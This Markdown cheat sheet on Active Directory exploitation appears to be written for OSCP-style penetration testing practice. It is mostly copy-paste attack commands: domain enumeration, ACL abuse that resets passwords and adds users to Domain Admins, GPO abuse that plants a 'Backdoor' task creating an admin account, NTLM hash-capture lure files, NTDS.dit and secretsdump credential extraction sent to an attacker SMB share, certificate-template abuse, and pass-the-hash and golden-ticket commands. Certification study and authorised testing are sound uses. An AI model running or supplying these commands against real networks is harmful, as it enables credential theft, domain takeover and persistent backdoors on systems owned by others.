3.1.AD-Exploitation.md

Active Directory Exploitation

📚 This file focuses on AD Enumeration, ACL Abuse, GPO Abuse, Persistence, and AD CS attacks. For specific attack techniques, see the dedicated files linked below.

Table of Contents

• Quick Reference - Attack Types
• Enumeration
  • Manual Enumeration
  • LDAP Enumeration
  • PowerView
  • BloodHound
  • enum4linux-ng
• NTLM Relay & Poisoning
• ACL Abuse
  • AllExtendedRights
  • GenericAll / GenericWrite
  • WriteDacl
  • ForceChangePassword
• GPO Abuse
  • SharpGPOAbuse
• NTLM Theft
  • ntlm_theft
• Kerberos Attacks & Credential Harvesting
• Persistence
  • Shadow Copies
  • NTDS.dit Extraction
• AD CS (Certificate Services)
  • Certipy
• Defense Evasion
• Impacket Tools Quick Reference
• AD Attack Quick Reference
• See Also

---

Quick Reference - Attack Types

Quick Check (One-liner)

# Quick AD enumeration
nxc smb $rhost -u '' -p '' && ldapsearch -x -H ldap://$rhost -b "" namingContexts && nxc smb $rhost -u $user -p $pass --users

Attack Category	Dedicated File	Key Techniques
Kerberos Attacks	3.3.Kerberos-Attacks.md	ASREPRoast, Kerberoasting, Golden/Silver Ticket, DCSync, Delegation
NTLM Attacks	3.4.NTLM-Relay-and-Responder.md	Responder, NTLM Relay, Pass-the-Hash, SMB Relay
Password Attacks	3.2.Password-Attacks.md	hashcat, mimikatz, Credential Dumping, Hash Cracking
AD Critical CVEs	CVE-Exploit	ZeroLogon, noPac, Certifried

---

AD Critical CVE Quick Reference

CVE	Name	One-liner Detection
CVE-2020-1472	ZeroLogon	nxc smb $rhost -u '' -p '' -M zerologon
CVE-2021-42278/42287	noPac	nxc smb $rhost -u '$user' -p '$pass' -M nopac
CVE-2022-26923	Certifried	Requires AD CS - check with certipy find
CVE-2021-34527	PrintNightmare	rpcdump.py $rhost | grep MS-RPRN

📖 For full exploitation commands, see CVE-Exploit - Windows/AD

---

Enumeration

Manual Enumeration

net user /domain
net user <USERNAME> /domain
net group /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain

PowerShell AD Module

Get-ADUser -Filter *
Get-ADUser -Identity <USERNAME> -Properties *
Get-ADGroup -Filter *
Get-ADGroupMember "Domain Admins"
Get-ADComputer -Filter * -Properties *

---

LDAP Enumeration

Install: sudo apt install ldap-utils

Anonymous Bind

# Check if anonymous bind is allowed
ldapsearch -x -H ldap://$rhost -b "DC=domain,DC=local" -s base namingcontexts

# Enumerate with anonymous bind
ldapsearch -x -H ldap://$rhost -b "DC=domain,DC=local" "(objectClass=*)"

Authenticated Enumeration

# List all users
ldapsearch -LLL -x -H ldap://$rhost -D "DOMAIN\user" -w "password" \
  -b "dc=domain,dc=local" -s sub "(objectClass=user)" sAMAccountName

# Users with description (may contain passwords!)
ldapsearch -LLL -x -H ldap://$rhost -D "DOMAIN\user" -w "password" \
  -b "dc=domain,dc=local" -s sub \
  "(&(objectClass=user)(Description=*))" \
  sAMAccountName cn Description memberOf

# Find Domain Admins
ldapsearch -LLL -x -H ldap://$rhost -D "DOMAIN\user" -w "password" \
  -b "dc=domain,dc=local" \
  "(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=local)" \
  sAMAccountName

# Find computers
ldapsearch -LLL -x -H ldap://$rhost -D "DOMAIN\user" -w "password" \
  -b "dc=domain,dc=local" "(objectClass=computer)" \
  name operatingSystem operatingSystemVersion

# Find SPNs (for Kerberoasting)
ldapsearch -LLL -x -H ldap://$rhost -D "DOMAIN\user" -w "password" \
  -b "dc=domain,dc=local" \
  "(&(objectClass=user)(servicePrincipalName=*))" \
  sAMAccountName servicePrincipalName

# Users with no pre-auth (ASREPRoast)
ldapsearch -LLL -x -H ldap://$rhost -D "DOMAIN\user" -w "password" \
  -b "dc=domain,dc=local" \
  "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \
  sAMAccountName

Python ldapdomaindump

# Install
pip install ldapdomaindump

# Dump all AD information
ldapdomaindump -u 'DOMAIN\user' -p 'password' ldap://$rhost -o ldap_dump/

# Creates HTML reports for easy viewing
firefox ldap_dump/domain_users.html

---

PowerView

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

powershell -ep bypass
. .\PowerView.ps1

Domain Information

Get-NetDomain
Get-NetDomainController
Get-DomainPolicy

User Enumeration

Get-NetUser
Get-NetUser | select cn,pwdlastset,lastlogon
Get-NetUser -SPN | select samaccountname,serviceprincipalname

Group Enumeration

Get-NetGroup | select cn
Get-NetGroup "Domain Admins" | select member
Get-NetGroupMember "Domain Admins"

Computer Enumeration

Get-NetComputer
Get-NetComputer | select operatingsystem,dnshostname

Share Enumeration

Find-DomainShare
Find-DomainShare -CheckShareAccess

ACL Enumeration

Get-ObjectAcl -Identity <USERNAME>
Get-ObjectAcl -Identity "Domain Admins" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

Find Local Admin Access

Find-LocalAdminAccess

---

BloodHound

BloodHound Python Collector

bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns '<RHOST>' -c all --zip
bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns '<RHOST>' --dns-tcp -c all --zip

SharpHound Collector

.\SharpHound.exe -c All
.\SharpHound.exe -c All --ldapusername <USERNAME> --ldappassword <PASSWORD>

---

enum4linux-ng

enum4linux-ng $rhost
enum4linux-ng -A $rhost
enum4linux-ng -u '<USERNAME>' -p '<PASSWORD>' $rhost

---

NTLM Relay & Poisoning

📚 Moved to dedicated file: NTLM Relay & Responder

Covers: Responder setup, NTLM Relay attack, SMB Relay, Pass-the-Hash, NTLMv2 cracking, and mitigation.

---

ACL Abuse

AllExtendedRights

Allows password reset, force change password, and read LAPS password

Enumerate with BloodHound

Look for: "AllExtendedRights" edge in BloodHound graph

Enumerate with PowerView

# Find users with AllExtendedRights on other objects
Get-ObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "ExtendedRight" } | select ObjectDN, SecurityIdentifier, ActiveDirectoryRights

# Check specific user
Get-ObjectAcl -Identity "TargetUser" -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "ExtendedRight" }

Reset User Password (Linux)

# Using net rpc (from Kali)
net rpc password "target_user" 'NewPassword123!' -U "domain/attacker_user%password" -S $dc_ip

# Verify new credentials
nxc winrm $rhost -u 'target_user' -p 'NewPassword123!' -d domain

Reset User Password (Windows)

# Using PowerView
Set-DomainUserPassword -Identity TargetUser -AccountPassword (ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force) -Verbose

# Using net command
net user TargetUser NewPassword123! /domain

GenericAll / GenericWrite

Full control over object - can reset password, modify attributes, etc.

Enumerate

Get-ObjectAcl -Identity "TargetUser" -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "GenericAll|GenericWrite" }

Abuse - Add to Group

# Add user to Domain Admins
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'AttackerUser' -Verbose

Abuse - Set SPN for Kerberoasting

# Set fake SPN on user for Kerberoasting
Set-DomainObject -Identity TargetUser -SET @{serviceprincipalname='nonexistent/YOURSERVICENAME'}

# Now Kerberoast that user
Get-DomainUser TargetUser | Get-DomainSPNTicket | select -expand Hash

WriteDacl

Can modify ACL to give yourself more permissions

# Grant yourself GenericAll
Add-ObjectAcl -TargetIdentity TargetUser -PrincipalIdentity AttackerUser -Rights All

ForceChangePassword

Can reset password without knowing current password

# Using rpcclient
rpcclient -U 'attacker_user%password' $dc_ip
rpcclient $> setuserinfo2 target_user 23 'NewPassword123!'

---

GPO Abuse

SharpGPOAbuse

https://github.com/byronkg/SharpGPOAbuse

Abuse Group Policy Object permissions to escalate privileges.

Check GPO Permissions

# Using PowerView
Get-GPPermission -Name "Default Domain Policy" -All

# Find GPOs where user has GpoEditDeleteModifySecurity
Get-NetGPO | % { Get-ObjectAcl -ResolveGUIDs -Name $_.Name } | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericAll|GenericWrite" }

Add Local Admin via GPO

# Add current user to local Administrators group on all machines affected by GPO
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount CurrentUser --GPOName "Default Domain Policy"

# Force GPO update
gpupdate /force

Add Immediate Scheduled Task

# Create scheduled task that runs as SYSTEM
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Backdoor" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add && net localgroup administrators backdoor /add" --GPOName "Vulnerable GPO"

Add User Rights

# Grant SeDebugPrivilege to user
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeDebugPrivilege" --UserAccount AttackerUser --GPOName "Target GPO"

pyGPOAbuse (Linux)

https://github.com/Hackndo/pyGPOAbuse

# Install
pip install pygpoabuse

# Add scheduled task (runs as SYSTEM)
python3 pygpoabuse.py $domain/$user:$pass -gpo-id <GPO-GUID> -command "net user hacker Password123! /add && net localgroup administrators hacker /add" -dc-ip $rhost

# Add local admin
python3 pygpoabuse.py $domain/$user:$pass -gpo-id <GPO-GUID> -localadmin -dc-ip $rhost

GPO Enumeration

# List all GPOs
Get-GPO -All

# Get GPO details
Get-GPOReport -Name "Default Domain Policy" -ReportType Html -Path "gpo_report.html"

# Find writable GPOs with BloodHound
MATCH (u:User {name:"ATTACKER@DOMAIN.COM"})-[r:GenericWrite|GenericAll|WriteProperty|Owns]->(g:GPO) RETURN u,r,g

---

NTLM Theft

ntlm_theft

https://github.com/Greenwolf/ntlm_theft

Generate files that trigger NTLM authentication when opened/accessed.

Generate All File Types

python3 ntlm_theft.py -g all -s $lhost -f TriggerFile

Generate Specific Types

# LNK file (shortcut) - triggers when folder is browsed
python3 ntlm_theft.py -g lnk -s $lhost -f Important

# SCF file (Shell Command File)
python3 ntlm_theft.py -g scf -s $lhost -f Important

# URL file
python3 ntlm_theft.py -g url -s $lhost -f Important

# Office documents
python3 ntlm_theft.py -g docx -s $lhost -f Important
python3 ntlm_theft.py -g xlsx -s $lhost -f Important

Upload to Writable Share

# Upload .lnk to writable SMB share
smbclient -N //target/ShareName
smb: \> put Important.lnk

Capture with Responder

# Start Responder before uploading
sudo responder -I tun0

# When user browses share, NTLMv2 hash is captured

---

Inveigh (PowerShell)

Windows-based LLMNR/NBT-NS poisoner - See also: NTLM Relay & Responder

# Import module
Import-Module .\Inveigh.ps1

# Start capturing
Invoke-Inveigh -FileOutput Y -FileOutputDirectory C:\Temp\

---

Kerberos Attacks & Credential Harvesting

📚 Moved to dedicated file: Kerberos Attacks

Covers: ASREPRoast, Kerberoasting, Golden Ticket, Silver Ticket, DCSync, Constrained/Unconstrained Delegation, Pass the Ticket, Overpass the Hash

---

Persistence

Shadow Copies

Extract NTDS.dit from Domain Controller via Volume Shadow Copy

Create Shadow Copy (Requires DA)

# Connect to DC as Domain Admin
vssadmin Create Shadow /For=C: /AutoRetry=2

# Note the shadow copy device name (e.g., \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2)

Extract NTDS.dit

# Copy NTDS.dit from shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

# Export SYSTEM hive (required for decryption)
reg.exe save hklm\system c:\system.bak

Transfer & Extract Hashes

# Setup SMB server on Kali
impacket-smbserver kali . -username kali -password kali -smb2support

# From DC, copy files to attacker
# net use \\$lhost\kali /user:kali kali
# copy c:\ntds.dit.bak \\$lhost\kali\
# copy c:\system.bak \\$lhost\kali\

# Extract hashes
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

NTDS.dit Extraction

Remote via Impacket (Recommended)

# Extract all hashes remotely using VSS
impacket-secretsdump -just-dc $domain/<USERNAME>:<PASSWORD>@$rhost -use-vss

# Extract specific user
impacket-secretsdump -just-dc-user Administrator $domain/<USERNAME>:<PASSWORD>@$rhost

# With hash authentication
impacket-secretsdump -just-dc $domain/<USERNAME>@$rhost -hashes :<NTLM_HASH>

NetExec

# Dump NTDS
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' -d $domain --ntds

# With hash
nxc smb $rhost -u '<USERNAME>' -H '<NTLM_HASH>' -d $domain --ntds

---

AD CS (Certificate Services)

Certipy

https://github.com/ly4k/Certipy

Find Vulnerable Templates

certipy find -u '<USERNAME>@$domain' -p '<PASSWORD>' -dc-ip $rhost -vulnerable -stdout

ESC1: Misconfigured Certificate Templates

certipy req -ca '<CA>' -username '<USERNAME>@$domain' -password '<PASSWORD>' -target '<CA>' -template '<TEMPLATE>' -upn 'Administrator@$domain'
certipy auth -pfx Administrator.pfx -dc-ip $rhost

ESC4: Vulnerable Certificate Template Access Control

certipy template -username '<USERNAME>@$domain' -password '<PASSWORD>' -template '<TEMPLATE>' -save-old
certipy req -ca '<CA>' -username '<USERNAME>@$domain' -password '<PASSWORD>' -target $rhost -template '<TEMPLATE>' -upn 'Administrator@$domain'
certipy auth -pfx Administrator.pfx -dc-ip $rhost

ESC8: NTLM Relay to AD CS HTTP Endpoints

certipy relay -target 'http://<CA>'
python3 PetitPotam.py $rhost $domain
certipy auth -pfx dc.pfx -dc-ip $rhost

---

Defense Evasion

📚 Moved to Windows Command - Defense Evasion

Covers: AMSI Bypass, ETW Bypass, Script Block Logging Bypass, AppLocker Bypass

---

Impacket Tools Quick Reference

📖 For detailed Impacket usage in lateral movement context, see Lateral Movement

impacket-secretsdump

impacket-secretsdump $domain/<USERNAME>@$rhost
impacket-secretsdump -dc-ip $rhost $domain/<USERNAME>:<PASSWORD>@$rhost
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
impacket-secretsdump -ntds ntds.dit -system system LOCAL

impacket-psexec

impacket-psexec <USERNAME>@$rhost
impacket-psexec $domain/Administrator@$rhost -hashes :<NTLM_HASH>

impacket-wmiexec

impacket-wmiexec $domain/<USERNAME>:<PASSWORD>@$rhost
impacket-wmiexec -hashes :<NTLM_HASH> Administrator@$rhost

impacket-smbexec

impacket-smbexec $domain/<USERNAME>:<PASSWORD>@$rhost

impacket-getTGT

impacket-getTGT $domain/<USERNAME>:<PASSWORD>
impacket-getTGT $domain/<USERNAME> -hashes :<NTLM_HASH>
export KRB5CCNAME=<USERNAME>.ccache

impacket-GetUserSPNs

impacket-GetUserSPNs $domain/<USERNAME>:<PASSWORD> -dc-ip $rhost -request

impacket-GetNPUsers

impacket-GetNPUsers $domain/ -usersfile users.txt -format hashcat -outputfile hashes.asreproast

impacket-addcomputer

impacket-addcomputer -dc-ip $rhost -computer-name FAKEPC -computer-pass 'Password123!' $domain/<USERNAME>:<PASSWORD>

---

AD Attack Quick Reference

Attack Flow Based on Access Level

Access Level	Available Attacks
Domain User + DC Reachable	PowerView enumeration, BloodHound, ACL enumeration, Domain shares, Password spraying, AS-REP Roasting, Kerberoasting
Local Admin on Domain Machine	Cached credentials (secretsdump), mimikatz, LSASS dump
Domain Admin + DC Reachable	DCSync, NTDS.dit extraction, Golden Ticket creation
User NTLM Hash	Pass the Hash, Silver Ticket (if SPN hash), WMI/WinRM/PsExec

Hash Attack Reference

📖 See also: Lateral Movement - Pass the Hash | Kerberos Attacks - Golden Ticket

Attack	When to Use	Command
Pass the Hash	Have NTLM hash, need shell	impacket-psexec -hashes :<HASH> user@target
Overpass the Hash	Have NTLM, need Kerberos ticket	sekurlsa::pth /ntlm:<HASH> /run:powershell
Pass the Ticket	Have .kirbi or .ccache ticket	kerberos::ptt ticket.kirbi
Silver Ticket	Have service account hash	kerberos::golden /service:http /rc4:<HASH>
Golden Ticket	Have krbtgt hash (persistence)	kerberos::golden /krbtgt:<HASH> /ptt

---

See Also

Related AD Exploitation Files

• Password Attacks - Credential cracking, extraction, and hash attacks
• Kerberos Attacks - ASREPRoast, Kerberoasting, Golden/Silver Tickets, DCSync, Constrained Delegation ⭐
• NTLM Relay & Responder - Responder setup, NTLM Relay, Pass-the-Hash ⭐
• AD CS Attacks - Certipy, ESC1-ESC8, PassTheCert, PKINIT, Golden Certificate ⭐
• Shadow Credentials - pyWhisker, Whisker, msDS-KeyCredentialLink ⭐
• Kerberos Delegation - Constrained/RBCD Delegation, S4U Attack Chain ⭐

Post-Exploitation & Movement

• Lateral Movement - PsExec, WMI, WinRM, PTH, PTT techniques
• Pivoting & Tunneling - Chisel, Ligolo-ng, ProxyChains
• Ligolo-ng Complete Guide - Single/multi-hop pivoting, troubleshooting
• Windows Privilege Escalation - SeImpersonate, SeBackup, Registry Credentials

OSCP Preparation

• OSCP Exam Guide - AD Methodology - Complete AD attack workflow
• Lab Walkthrough Examples - HTB Forest, AD Set attack chains
• Exam Tips & Tricks - Enumeration priority, time management

---

External Resources

• WADComs - Interactive AD Cheatsheet
• The Hacker Recipes - AD Recon
• The Hacker Recipes - AD Movement
• adPEAS - AD Enumeration Script
• Invoke-ADEnum
• NetExec Wiki
• BloodHound.py (Python collector)